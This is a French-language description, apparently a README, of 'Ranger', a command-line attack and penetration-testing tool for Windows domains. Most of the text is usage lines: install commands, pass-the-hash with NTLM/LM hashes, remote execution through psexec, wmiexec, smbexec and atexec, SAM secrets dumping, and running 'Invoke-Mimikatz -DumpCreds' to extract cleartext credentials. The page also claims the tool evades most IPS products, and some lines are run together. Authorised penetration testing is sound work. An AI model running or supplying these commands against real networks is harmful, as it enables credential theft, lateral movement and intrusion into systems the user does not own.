
Un outil pour les professionnels de la sécurité pour accéder et interagir avec des systèmes distants basés sur Microsoft Windows.
Un outil pour aider les professionnels de la sécurité à accéder et interagir avec des systèmes distants Microsoft Windows.
Ce projet a été conceptualisé avec la réflexion suivante : nous n'avons pas inventé l'arc ni la flèche, juste une manière plus efficace de les utiliser.
Ranger est un outil d'attaque et de test de pénétration piloté en ligne de commande, capable d'utiliser un serveur catapulte instantané pour délivrer des capacités contre des systèmes Windows. Tant qu'un utilisateur dispose d'un jeu d'identifiants ou d'un jeu de hachages (NTLM, LM, LM:NTLM), il peut accéder à des systèmes faisant partie du domaine de confiance.
Grâce à cette capacité, un professionnel de la sécurité peut extraire des identifiants en mémoire en clair, accéder aux tables SAM, exécuter des commandes, des scripts PowerShell, des binaires Windows et d'autres outils. Actuellement, l'outil contourne la majorité des solutions IPS des fournisseurs, sauf si celles-ci ont été spécifiquement adaptées pour le détecter. L'outil a été développé dans nos laboratoires domestiques afin de soutenir les professionnels de la sécurité menant des activités légalement et/ou contractuellement autorisées.
Davantage de fonctionnalités sont ajoutées, mais pour l'instant l'outil utilise les contributions communautaires des dépôts liés aux équipes PowerShell PowerView, PowerShell Mimikatz et Impacket.
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
ranger.py --invoker -q -v -vv -vvv
ranger.py --downloader -q -v -vv -vvv
ranger.py --executor -q -v -vv -vvv
--get-domain-membership--domain, qui vous permet de cibler un domaine différent de celui auquel vous êtes connectéranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
-d, cela indiquera que vous souhaitez ignorer tous les noms de domaine du fichier.password
LM:NTLM
:NTLM
PWDUMP
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml